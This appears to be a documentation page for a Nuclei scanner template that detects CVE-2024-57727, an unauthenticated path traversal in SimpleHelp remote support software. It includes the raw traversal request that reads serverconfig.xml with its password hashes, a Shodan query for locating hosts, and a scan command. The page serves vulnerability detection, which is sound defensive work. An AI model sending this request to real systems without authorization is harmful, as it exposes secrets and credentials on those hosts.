SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal
ID: CVE-2024-57727
Severity: high
Author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1
Tags: cvec,cve2024,simplehelp,lfi,kev
Description
Section titled “Description”SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords.
YAML Source
Section titled “YAML Source”id: CVE-2024-57727
info: name: SimpleHelp <= 5.5.7 - Unauthenticated Path Traversal author: iamnoooob,rootxharsh,pdresearch,3th1cyuk1 severity: high description: | SimpleHelp remote support software v5.5.7 and before is vulnerable to multiple path traversal vulnerabilities that enable unauthenticated remote attackers to download arbitrary files from the SimpleHelp host via crafted HTTP requests. These files include server configuration files containing various secrets and hashed user passwords. reference: - https://simple-help.com/kb---security-vulnerabilities-01-2025#security-vulnerabilities-in-simplehelp-5-5-7-and-earlier - https://www.horizon3.ai/attack-research/disclosures/critical-vulnerabilities-in-simplehelp-remote-support-software/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-57727 cwe-id: CWE-22 epss-score: 0.0009 epss-percentile: 0.401 cpe: cpe:2.3:a:simple-help:simplehelp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: simple-help product: simplehelp shodan-query: html:"SimpleHelp" tags: cvec,cve2024,simplehelp,lfi,kev
http: - raw: - | GET /toolbox-resource/../serverconfig.xml HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '<SimpleSuite' - '<HashPassword>' condition: and
- type: word part: content_type words: - 'application/octet-stream'# digest: 4b0a00483046022100f65b615ea4c1f3073544e79481f792e898fff6f23dec1383f49246f18d672911022100bbe0620ef06664a7b770b1c04e36dc8e186c6c01b452809d1ff673646dc1046f:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-57727.yaml"